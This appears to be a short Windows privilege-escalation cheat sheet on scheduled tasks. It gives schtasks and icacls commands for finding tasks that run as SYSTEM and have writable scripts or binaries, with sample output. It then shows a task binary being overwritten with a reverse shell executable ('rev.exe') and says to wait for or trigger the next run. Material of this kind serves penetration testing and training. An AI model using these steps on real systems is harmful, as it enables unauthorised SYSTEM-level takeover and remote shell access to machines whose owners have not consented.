SCHEDULED TASKS
List scheduled tasks
All scheduled tasks — Tasks running as SYSTEM
schtasks /query /fo LIST /v
Get-ScheduledTask
Example Output
schtasks /query /fo LIST /v | findstr /i 'taskname\|run as\|task to run'
TaskName: \CustomBackup
Run As User: SYSTEM
Task To Run: C:\Scripts\backup.bat
(Runs as SYSTEM - check if script is writable)
Writable task scripts
Can you modify the script? — Runs as task owner
Check permissions on scripts referenced by tasks
icacls <script_path>
Example Output
schtasks /query /fo LIST /v | findstr /i 'task\|run\|author'
TaskName: \Backup
Run As User: SYSTEM
Task To Run: C:\Scripts\backup.bat
icacls C:\Scripts\backup.bat
BUILTIN\Users:(F) <- FULL CONTROL!
(Modify script, wait for execution)
Task binary replacement
Replace with reverse shell — Waits for next scheduled run
If task runs a binary you can overwrite
Example Output
Task runs: C:\Scripts\app.exe
icacls C:\Scripts\app.exe -> Users:(F)
copy C:\temp\rev.exe C:\Scripts\app.exe /Y
(Wait for scheduled run or trigger manually)